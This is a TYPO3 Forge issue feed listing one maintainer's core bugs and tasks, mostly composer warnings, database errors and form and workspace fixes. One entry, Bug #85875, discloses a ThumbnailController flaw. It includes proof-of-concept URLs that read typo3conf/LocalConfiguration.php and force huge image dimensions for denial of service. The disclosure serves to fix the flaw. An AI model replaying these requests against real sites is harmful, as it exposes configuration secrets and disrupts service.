TYPO3 Forge: Issueshttp://forge.typo3.org/http://forge.typo3.org/themes/typo3_forge/favicon/favicon.png?17058661692024-03-14T17:36:06ZTYPO3 Forge
Redmine TYPO3 Core - Bug #103400 (Under Review): Avoid mapping route values that are out of scopehttp://forge.typo3.org/issues/1034002024-03-14T17:36:06ZOliver Haderoliver.hader@typo3.orgTYPO3 Core - Bug #89392 (Closed): Fix composer definitionshttp://forge.typo3.org/issues/893922019-10-10T15:54:25ZOliver Haderoliver.hader@typo3.org
<pre>
The typo3/cms-core package of which you are a maintainer has
failed to update due to invalid data contained in your composer.json.
Please address this as soon as possible since the package stopped updating.
It is recommended that you use `composer validate` to check for errors when you
change your composer.json.
Below is the full update log which should highlight errors as
"Skipped branch ...":
[Composer\Repository\InvalidRepositoryException]: Some branches contained invalid data and were discarded, it is advised to review the log and fix any issues present in branches
Reading composer.json of typo3/cms-core (v10.1.0)
Found cached composer.json of typo3/cms-core (v10.1.0)
Reading composer.json of typo3/cms-core (v10.0.0)
Found cached composer.json of typo3/cms-core (v10.0.0)
Reading composer.json of typo3/cms-core (v9.5.9)
Found cached composer.json of typo3/cms-core (v9.5.9)
Reading composer.json of typo3/cms-core (v9.5.8)
Found cached composer.json of typo3/cms-core (v9.5.8)
Reading composer.json of typo3/cms-core (v9.5.7)
Found cached composer.json of typo3/cms-core (v9.5.7)
Reading composer.json of typo3/cms-core (v9.5.6)
Found cached composer.json of typo3/cms-core (v9.5.6)
Reading composer.json of typo3/cms-core (v9.5.5)
Found cached composer.json of typo3/cms-core (v9.5.5)
Reading composer.json of typo3/cms-core (v9.5.4)
Found cached composer.json of typo3/cms-core (v9.5.4)
Reading composer.json of typo3/cms-core (v9.5.3)
Found cached composer.json of typo3/cms-core (v9.5.3)
Reading composer.json of typo3/cms-core (v9.5.2)
Found cached composer.json of typo3/cms-core (v9.5.2)
Reading composer.json of typo3/cms-core (v9.5.1)
Found cached composer.json of typo3/cms-core (v9.5.1)
Reading composer.json of typo3/cms-core (v9.5.0)
Found cached composer.json of typo3/cms-core (v9.5.0)
Reading composer.json of typo3/cms-core (v9.4.0)
Found cached composer.json of typo3/cms-core (v9.4.0)
Reading composer.json of typo3/cms-core (v9.3.3)
Found cached composer.json of typo3/cms-core (v9.3.3)
Reading composer.json of typo3/cms-core (v9.3.2)
Found cached composer.json of typo3/cms-core (v9.3.2)
Reading composer.json of typo3/cms-core (v9.3.1)
Found cached composer.json of typo3/cms-core (v9.3.1)
Reading composer.json of typo3/cms-core (v9.3.0)
Found cached composer.json of typo3/cms-core (v9.3.0)
Reading composer.json of typo3/cms-core (v9.2.1)
Found cached composer.json of typo3/cms-core (v9.2.1)
Reading composer.json of typo3/cms-core (v9.2.0)
Found cached composer.json of typo3/cms-core (v9.2.0)
Reading composer.json of typo3/cms-core (v9.1.0)
Found cached composer.json of typo3/cms-core (v9.1.0)
Reading composer.json of typo3/cms-core (v9.0.0)
Found cached composer.json of typo3/cms-core (v9.0.0)
Reading composer.json of typo3/cms-core (v8.7.27)
Found cached composer.json of typo3/cms-core (v8.7.27)
Reading composer.json of typo3/cms-core (v8.7.26)
Found cached composer.json of typo3/cms-core (v8.7.26)
Reading composer.json of typo3/cms-core (v8.7.25)
Found cached composer.json of typo3/cms-core (v8.7.25)
Reading composer.json of typo3/cms-core (v8.7.24)
Found cached composer.json of typo3/cms-core (v8.7.24)
Reading composer.json of typo3/cms-core (v8.7.23)
Found cached composer.json of typo3/cms-core (v8.7.23)
Reading composer.json of typo3/cms-core (v8.7.22)
Found cached composer.json of typo3/cms-core (v8.7.22)
Reading composer.json of typo3/cms-core (v8.7.21)
Found cached composer.json of typo3/cms-core (v8.7.21)
Reading composer.json of typo3/cms-core (v8.7.20)
Found cached composer.json of typo3/cms-core (v8.7.20)
Reading composer.json of typo3/cms-core (v8.7.19)
Found cached composer.json of typo3/cms-core (v8.7.19)
Reading composer.json of typo3/cms-core (v8.7.18)
Found cached composer.json of typo3/cms-core (v8.7.18)
Reading composer.json of typo3/cms-core (v8.7.17)
Found cached composer.json of typo3/cms-core (v8.7.17)
Reading composer.json of typo3/cms-core (v8.7.16)
Found cached composer.json of typo3/cms-core (v8.7.16)
Reading composer.json of typo3/cms-core (v8.7.15)
Found cached composer.json of typo3/cms-core (v8.7.15)
Reading composer.json of typo3/cms-core (v8.7.14)
Found cached composer.json of typo3/cms-core (v8.7.14)
Reading composer.json of typo3/cms-core (v8.7.13)
Found cached composer.json of typo3/cms-core (v8.7.13)
Reading composer.json of typo3/cms-core (v8.7.12)
Found cached composer.json of typo3/cms-core (v8.7.12)
Reading composer.json of typo3/cms-core (v8.7.11)
Found cached composer.json of typo3/cms-core (v8.7.11)
Reading composer.json of typo3/cms-core (v8.7.10)
Found cached composer.json of typo3/cms-core (v8.7.10)
Reading composer.json of typo3/cms-core (v8.7.9)
Found cached composer.json of typo3/cms-core (v8.7.9)
Reading composer.json of typo3/cms-core (v8.7.8)
Found cached composer.json of typo3/cms-core (v8.7.8)
Reading composer.json of typo3/cms-core (v8.7.7)
Found cached composer.json of typo3/cms-core (v8.7.7)
Reading composer.json of typo3/cms-core (master)
Importing branch master (dev-master)
Skipped branch master, Invalid package information:
Deprecation warning: replace.core is invalid, it should have a vendor name, a forward slash, and a package name. The vendor and package name can be words separated by -, . or _. The complete name should match "[a-z0-9]([_.-]?[a-z0-9]+)*/[a-z0-9]([_.-]?[a-z0-9]+)*". Make sure you fix this as Composer 2.0 will error.
Reading composer.json of typo3/cms-core (8.7)
Found cached composer.json of typo3/cms-core (8.7.x-dev)
Reading composer.json of typo3/cms-core (9.2)
Found cached composer.json of typo3/cms-core (9.2.x-dev)
Reading composer.json of typo3/cms-core (9.3)
Found cached composer.json of typo3/cms-core (9.3.x-dev)
Reading composer.json of typo3/cms-core (9.5)
Found cached composer.json of typo3/cms-core (9.5.x-dev)
</pre>
<p><code>composer validate</code> in typo3/sysext/core:</p>
<pre>
composer validate
Deprecation warning: replace.core is invalid, it should have a vendor name, a forward slash, and a package name. The vendor and package name can be words separated by -, . or _. The complete name should match "[a-z0-9]([_.-]?[a-z0-9]+)*/[a-z0-9]([_.-]?[a-z0-9]+)*". Make sure you fix this as Composer 2.0 will error.
Deprecation warning: replace.core is invalid, it should have a vendor name, a forward slash, and a package name. The vendor and package name can be words separated by -, . or _. The complete name should match "[a-z0-9]([_.-]?[a-z0-9]+)*/[a-z0-9]([_.-]?[a-z0-9]+)*". Make sure you fix this as Composer 2.0 will error.
./composer.json is valid, but with a few warnings
See https://getcomposer.org/doc/04-schema.md for details on the schema
Deprecation warning: replace.core is invalid, it should have a vendor name, a forward slash, and a package name. The vendor and package name can be words separated by -, . or _. The complete name should match "[a-z0-9]([_.-]?[a-z0-9]+)*/[a-z0-9]([_.-]?[a-z0-9]+)*". Make sure you fix this as Composer 2.0 will error.
</pre> TYPO3 Core - Bug #86923 (Closed): Symfony expressions/conditions doesn't work in user-tsconfighttp://forge.typo3.org/issues/869232018-11-14T08:50:52ZOliver Haderoliver.hader@typo3.orgTYPO3 Core - Bug #85875 (Closed): Issues in ThumbnailControllerhttp://forge.typo3.org/issues/858752018-08-16T18:33:06ZOliver Haderoliver.hader@typo3.org
<ul>
<li>information disclosure (fileIdentifier can be arbitrary, supports fallback zero-storage)</li>
<li>denial of service (dimensions, basically whole configuration can be arbitrary)</li>
</ul>
<p>Introduced in <a class="external" href="https://review.typo3.org/#/c/56765/">https://review.typo3.org/#/c/56765/</a> - not released yet to 9.4.0 nor 8.7.19</p>
<p>Solution: Add HMAC to all HTTP request parameters.</p>
<a name="PoC"></a>
<h2 >PoC<a href="#PoC" class="wiki-anchor">¶</a></h2>
<p>XSRF Token has to be adjusted in the links below</p>
<a name="Information-Disclosure"></a>
<h3 >Information Disclosure<a href="#Information-Disclosure" class="wiki-anchor">¶</a></h3>
<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=typo3conf/LocalConfiguration.php&processingInstructions%5Bwidth%5D=64
&processingInstructions%5Bheight%5D=64c
&processingInstructions%5Bcrop%5D=
</pre>
<a name="Denial-of-Service"></a>
<h3 >Denial of Service<a href="#Denial-of-Service" class="wiki-anchor">¶</a></h3>
<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=1%3A%2Fuser_upload%2Fafter_01.png
&processingInstructions%5Bwidth%5D=1000000
&processingInstructions%5Bheight%5D=1000000c
&processingInstructions%5Bcrop%5D=
</pre> TYPO3 Core - Bug #81747 (Closed): Copying workspace version record failshttp://forge.typo3.org/issues/817472017-06-29T18:16:07ZOliver Haderoliver.hader@typo3.org
<p>Copying workspace version records fails in Doctrine DBAL exception due to using computed properties directly in the database - which do not exist. This misbehavior has been introduced in issue <a class="issue tracker-4 status-5 priority-4 priority-default closed" title="Task: Wrap doesRecordExist in new method (Closed)" href="http://forge.typo3.org/issues/79515">#79515</a> which switched to use BackendUtility:workspaceOL() without further sanitization.</p>
<p>Example of Doctrine DBAL exception:<br /><pre>
Doctrine\DBAL\Exception\InvalidFieldNameException: An exception occurred while executing 'SELECT `uid`, `pid`, `t3ver_oid`, `t3ver_id`, `t3ver_wsid`, `t3ver_label`, `t3ver_state`, `t3ver_stage`, `t3ver_count`, `t3ver_tstamp`, `t3ver_move_id`, `t3_origuid`, `tstamp`, `crdate`, `cruser_id`, `editlock`, `hidden`, `sorting`, `CType`, `header`, `header_position`, `rowDescription`, `bodytext`, `bullets_type`, `uploads_description`, `uploads_type`, `assets`, `image`, `imagewidth`, `imageorient`, `imagecols`, `imageborder`, `media`, `layout`, `frame_class`, `deleted`, `cols`, `spaceBefore`, `spaceAfter`, `space_before_class`, `space_after_class`, `records`, `pages`, `starttime`, `endtime`, `colPos`, `subheader`, `fe_group`, `header_link`, `image_zoom`, `header_layout`, `list_type`, `sectionIndex`, `linkToTop`, `file_collections`, `filelink_size`, `filelink_sorting`, `target`, `date`, `recursive`, `imageheight`, `sys_language_uid`, `pi_flexform`, `accessibility_title`, `accessibility_bypass`, `accessibility_bypass_text`, `l18n_parent`, `l18n_diffsource`, `l10n_source`, `selected_categories`, `category_field`, `table_class`, `table_caption`, `table_delimiter`, `table_enclosure`, `table_header_position`, `table_tfoot`, `tx_irretutorial_1nff_hotels`, `tx_irretutorial_1ncsv_hotels`, `tx_irretutorial_flexform`, `l10n_state`, `categories`, `_ORIG_pid` FROM `tt_content` WHERE (`pid` = ?) AND (`t3ver_oid` = ?) AND (`t3ver_wsid` = ?) AND (`tt_content`.`deleted` = 0)' with params [-1, 300, 1]:
</pre></p> TYPO3 Core - Task #80149 (Closed): Remove $GLOBALS['TYPO3_CONF_VARS']['FE']['pageOverlayFields']http://forge.typo3.org/issues/801492017-03-06T12:27:17ZOliver Haderoliver.hader@typo3.org
<p>The configuration $GLOBALS['TYPO3_CONF_VARS']['FE']['pageOverlayFields']<br />is removed from the default configuration as well as from the overlay<br />handling in PageRepository and RootlineUtility. This setting has been<br />used to determine overlay fields in the table pages_language_overlay at<br />a time in the runtime processing when the complete TCA was not fully<br />available. Since the allowLanguageSynchronization possibility has been<br />integrated into TYPO3 CMS 8, l10n_mode was available already and the TCA<br />is loaded as well, the pageOverlayFields settings are superfluous.</p> TYPO3 Core - Task #69369 (Closed): EXT:form - Use property value instead of data for TEXTAREA, TE...http://forge.typo3.org/issues/693692015-08-27T17:02:52ZOliver Haderoliver.hader@typo3.org
<p>The Form Objects (system extension "form") TEXTAREA, TEXTBLOCK, OPTION currently use <code>data</code> as property name to define default values. However, all other objects use <code>value</code>. Since <code>data</code> implies the possibility to use computed values, it shall be deprecated and <code>value</code> used instead.</p> TYPO3 Core - Bug #47969 (Closed): Call to undefined function mime_content_type()http://forge.typo3.org/issues/479692013-05-06T09:21:53ZOliver Haderoliver.hader@typo3.org
<p>Call to undefined function mime_content_type() on fetching the mime type of the favicon.<br />I'm still investigating the PHP versions and environment. However it looks like a superfluous regression from <a class="issue tracker-4 status-5 priority-4 priority-default closed" title="Task: Make mimetype-detection possible without finfo_file (pre-PHP-5.3, no pecl-fileinfo) (Closed)" href="http://forge.typo3.org/issues/46126">#46126</a></p> TYPO3 Core - Bug #46530 (Closed): Crop-Scaled images have wrong file content typehttp://forge.typo3.org/issues/465302013-03-22T09:57:25ZOliver Haderoliver.hader@typo3.org
The following scenario is given:
<ul>
<li>resize a 300dpi TIFF image to PNG using stdWrap/cObj</li>
<li>the 'fileExtension' configuration is not set ($fileArray['ext'] is empty)</li>
<li>the processed file csm_... has the file extension PNG</li>
<li>but the file content type is still TIFF, so the file was just renamed, but not converted to PNG</li>
</ul>
<p>Solution:<br />Since the processing task determines the accordant filename and file extension, the image processor (ImageMagick, ...) needs to know about that fact as well.</p> TYPO3 Core - Bug #46205 (Closed): Cache file could not be written on concurrent actionshttp://forge.typo3.org/issues/462052013-03-12T15:30:34ZOliver Haderoliver.hader@typo3.org
<p>I get several errors like</p>
<p><code>The cache file "htdocs/typo3temp/Cache/Data/t3lib_l10n/3e2cbbda0301cf592e5831ef26c56b7b" could not be written.</code></p>
<p>This happens while a scheduler process is running that imports data using t3lib_TCEmain/DataHandler an I'm trying to work in the backend.<br />I consider this kind of a race condition that e.g. in this case language caches are flushed too often if a new record gets persisted in the DataHandler.</p>
<p>I can reproduce this on my local machine (Mac OS X) and a staging server with Ubuntu 12.04.</p> TYPO3 Core - Task #45676 (Rejected): Workspace references are not consideredhttp://forge.typo3.org/issues/456762013-02-20T21:32:35ZOliver Haderoliver.hader@typo3.org
<p>Workspace references for MM and IRRE records are not considered, since only the UID of the live record is considered (due to overlays).<br />Since this might(!) work in most cases for existing records that get modified in a workspace, it does not not for records that are newly created. In this case, the "live record" is a workspace placeholder without any data.</p>
<p>MM and IRRE always need to use the most specific UID in references, which is the versioned record in this case.</p> TYPO3 Core - Task #31274 (Closed): Disable file upload in form wizardhttp://forge.typo3.org/issues/312742011-10-25T12:24:00ZOliver Haderoliver.hader@typo3.org
<p>Due to a wrong implementation the file upload feature in the form wizard will be disbled for the time being.</p> TYPO3 Core - Bug #31120 (Closed): Add default csc-mailform DIV wraphttp://forge.typo3.org/issues/311202011-10-19T18:59:47ZOliver Haderoliver.hader@typo3.org
<p>A new form element does not have any class settings.<br />This issue reintroduces stdWrap possibilites for the new form system extension.</p> TYPO3 Core - Bug #11163 (Closed): Actions performed on tabs are not executed on the correct works...http://forge.typo3.org/issues/111632010-11-30T14:00:43ZOliver Haderoliver.hader@typo3.org
<p>Actions performed on tabs are not executed on the correct workspace</p> TYPO3 Core - Bug #17001 (Closed): config.linkVars check doesn't allow negative rangeshttp://forge.typo3.org/issues/170012007-02-17T11:05:42ZOliver Haderoliver.hader@typo3.org
<p>The newly introduced linkVars check in TYPO3 4.1 doesn't allow negative ranges.</p>
<p>Example:<br />config.linkVars = my_variable(1-5) is valid<br />config.linkVars = my_variable(-1-5) doesn't work<br />config.linkVars = my_variable(-1--3) doesn't work and looks very ugly</p>
<p>I suggest to use ".." as delimiter, e.g.<br />config.linVars = my_variable(-1..-3)</p>
<p>Possibly it is allowed in TYPO3 4.2 to use config.linkVars = tx_myext_pi1[var](<del>1..-3), but we should change the delimiter from "</del>" to ".." now.<br />(issue imported from #M5009)</p>